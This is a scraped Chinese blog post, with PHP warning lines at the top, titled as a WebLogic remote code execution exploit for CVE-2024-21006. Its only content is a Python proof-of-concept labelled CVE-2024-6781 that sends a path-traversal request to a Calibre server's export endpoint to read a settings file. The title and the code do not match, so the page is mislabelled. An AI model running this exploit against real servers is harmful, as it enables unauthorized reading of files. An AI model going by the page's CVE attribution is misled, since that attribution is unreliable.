Warning: Undefined array key "HTTP_ACCEPT_LANGUAGE" in /www/wwwroot/blog.guapiwo.top/usr/themes/joe/public/tencent_protect.php on line 40

Deprecated: strpos(): Passing null to parameter #1 ($haystack) of type string is deprecated in /www/wwwroot/blog.guapiwo.top/usr/themes/joe/public/tencent_protect.php on line 40
WebLogic远程代码执行漏洞(CVE-2024-21006) - 瓜皮博客_d0glun
WebLogic远程代码执行漏洞(CVE-2024-21006)
WebLogic远程代码执行漏洞(CVE-2024-21006)
瓜皮博客_d0glun

WebLogic远程代码执行漏洞(CVE-2024-21006)

d0glun
2025-05-20 / 0 评论 / 3 阅读 / 正在检测是否收录...

WebLogic远程代码执行漏洞(CVE-2024-21006)

#! /usr/bin/env python3
# Ldwk
# PoC for: CVE-2024-6781
import json
import sys

import requests

_target = "http://localhost:8080" # SET ME
_book_id = 1 # ensure book_id exists

def exploit(path):
    r = requests.post(
        f"{_target}/cdb/cmd/export",
        headers={"Content-Type": "application/json"},
        json=["extra_file", _book_id, path, ""],
    )
    try:
        print(r.json()["result"])
    except Exception:
        print(r.text)

if __name__ == "__main__":
    exploit("..\\..\\..\\Calibre Settings\\gui.json")
0

评论 (0)

取消